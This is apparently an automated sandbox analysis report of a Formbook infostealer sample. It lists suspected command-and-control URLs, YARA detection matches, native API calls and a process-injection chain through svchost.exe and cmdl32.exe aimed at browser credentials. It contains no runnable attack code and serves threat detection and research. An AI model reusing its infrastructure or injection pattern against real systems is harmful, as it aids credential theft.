            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:30 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:39 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:41 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:44 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:46 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 30 Sep 2024 08:44:14 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-30T08:44:19.2137950Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=b92b251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=LaxDate: Mon, 30 Sep 2024 08:44:20 GMTConnection: closeContent-Length: 1163
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=b92a251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=LaxDate: Mon, 30 Sep 2024 08:44:22 GMTConnection: closeContent-Length: 1163
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=b92c251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=LaxDate: Mon, 30 Sep 2024 08:44:24 GMTConnection: closeContent-Length: 1163
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=b92e251b6c5f2a852b091a4d6cbeb7; Path=/; HttpOnly; SameSite=LaxDate: Mon, 30 Sep 2024 08:44:26 GMTConnection: closeContent-Length: 1163
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 30 Sep 2024 08:44:48 GMTserver: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 30 Sep 2024 08:44:51 GMTserver: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 30 Sep 2024 08:44:54 GMTserver: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 30 Sep 2024 08:44:56 GMTserver: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: cmdl32.exe, 00000007.00000002.4614735338.0000000005DA2000.00000004.10000000.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000002.4607532068.0000000003A92000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://github.com/necolas/normalize.css
            Source: cmdl32.exe, 00000007.00000002.4614735338.000000000575A000.00000004.10000000.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000002.4607532068.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi?9jtPKX=n8oXMK/zoXm
            Source: BpYpWzndkWcpUJ.exe, 00000009.00000002.4615262258.000000000507F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mondayigboleague.info
            Source: BpYpWzndkWcpUJ.exe, 00000009.00000002.4615262258.000000000507F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mondayigboleague.info/zeyp/
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: cmdl32.exe, 00000007.00000003.2669870043.00000000079BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033o
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028C6000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.00000000028CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: cmdl32.exe, 00000007.00000002.4603396421.00000000028A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C333 NtClose,2_2_0042C333
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,2_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B60 NtClose,LdrInitializeThunk,2_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874340 NtSetContextThread,2_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873090 NtSetValueKey,2_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873010 NtOpenDirectoryObject,2_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874650 NtSuspendThread,2_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B80 NtQueryInformationFile,2_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BA0 NtEnumerateValueKey,2_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BE0 NtQueryValueKey,2_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BF0 NtAllocateVirtualMemory,2_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AB0 NtWaitForSingleObject,2_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AD0 NtReadFile,2_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AF0 NtWriteFile,2_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038739B0 NtGetContextThread,2_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F90 NtProtectVirtualMemory,2_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FA0 NtQuerySection,2_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FB0 NtResumeThread,2_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FE0 NtCreateFile,2_2_03872FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F30 NtCreateSection,2_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F60 NtCreateProcessEx,2_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E80 NtReadVirtualMemory,2_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EA0 NtAdjustPrivilegesToken,2_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EE0 NtQueueApcThread,2_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E30 NtWriteVirtualMemory,2_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DB0 NtEnumerateKey,2_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DD0 NtDelayExecution,2_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D00 NtSetInformationFile,2_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872D10 NtMapViewOfSection,2_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03873D10 NtOpenProcessToken,2_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872D30 NtUnmapViewOfSection,2_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03873D70 NtOpenThread,2_2_03873D70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872CA0 NtQueryInformationToken,2_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872CC0 NtQueryVirtualMemory,2_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872CF0 NtOpenProcess,2_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872C00 NtQueryInformationProcess,2_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872C60 NtCreateKey,2_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872C70 NtFreeVirtualMemory,2_2_03872C70
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_049035C0 NtCreateMutant,LdrInitializeThunk,7_2_049035C0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04904650 NtSuspendThread,LdrInitializeThunk,7_2_04904650
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04904340 NtSetContextThread,LdrInitializeThunk,7_2_04904340
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04902CA0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04902C70
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902C60 NtCreateKey,LdrInitializeThunk,7_2_04902C60
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902DD0 NtDelayExecution,LdrInitializeThunk,7_2_04902DD0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04902DF0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04902D10
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_04902D30
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_04902E80
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902EE0 NtQueueApcThread,LdrInitializeThunk,7_2_04902EE0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902FB0 NtResumeThread,LdrInitializeThunk,7_2_04902FB0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902FE0 NtCreateFile,LdrInitializeThunk,7_2_04902FE0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902F30 NtCreateSection,LdrInitializeThunk,7_2_04902F30
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_049039B0 NtGetContextThread,LdrInitializeThunk,7_2_049039B0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902AD0 NtReadFile,LdrInitializeThunk,7_2_04902AD0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902AF0 NtWriteFile,LdrInitializeThunk,7_2_04902AF0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_04902BA0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04902BF0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04902BE0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902B60 NtClose,LdrInitializeThunk,7_2_04902B60
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04903090 NtSetValueKey,7_2_04903090
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04903010 NtOpenDirectoryObject,7_2_04903010
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902CC0 NtQueryVirtualMemory,7_2_04902CC0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902CF0 NtOpenProcess,7_2_04902CF0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902C00 NtQueryInformationProcess,7_2_04902C00
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902DB0 NtEnumerateKey,7_2_04902DB0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04903D10 NtOpenProcessToken,7_2_04903D10
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902D00 NtSetInformationFile,7_2_04902D00
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04903D70 NtOpenThread,7_2_04903D70
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902EA0 NtAdjustPrivilegesToken,7_2_04902EA0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902E30 NtWriteVirtualMemory,7_2_04902E30
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902F90 NtProtectVirtualMemory,7_2_04902F90
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902FA0 NtQuerySection,7_2_04902FA0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902F60 NtCreateProcessEx,7_2_04902F60
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902AB0 NtWaitForSingleObject,7_2_04902AB0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_04902B80 NtQueryInformationFile,7_2_04902B80
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_02728B30 NtCreateFile,7_2_02728B30
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_02728E40 NtClose,7_2_02728E40
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_02728FA0 NtAllocateVirtualMemory,7_2_02728FA0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_02728CA0 NtReadFile,7_2_02728CA0
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 7_2_02728DA0 NtDeleteFile,7_2_02728DA0
            Source: P030092024LANDWAY.exe, 00000000.00000003.2198040215.0000000004583000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs P030092024LANDWAY.exe
            Source: P030092024LANDWAY.exe, 00000000.00000003.2198571509.000000000472D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs P030092024LANDWAY.exe
            Source: P030092024LANDWAY.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            The rule matched in each of the following sources:
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: P030092024LANDWAY.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9933401031783681
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/11
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeFile created: C:\Users\user\AppData\Local\Temp\hepatoduodenostomyJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: cmdl32.exe, 00000007.00000002.4603396421.0000000002902000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.000000000290C000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2670818362.0000000002902000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.000000000292F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: P030092024LANDWAY.exe, Virustotal: Detection: 29%
            Source: P030092024LANDWAY.exe, ReversingLabs: Detection: 28%
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, File read: C:\Users\user\Desktop\P030092024LANDWAY.exe
            Source: unknown, Process created: C:\Users\user\Desktop\P030092024LANDWAY.exe "C:\Users\user\Desktop\P030092024LANDWAY.exe"
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\P030092024LANDWAY.exe"
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe, Process created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe"
            Source: C:\Windows\SysWOW64\cmdl32.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Section loaded: version.dll
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exe, Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: cmpbk32.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: cmutil.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: cabinet.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: version.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\cmdl32.exe, Section loaded: uxtheme.dll
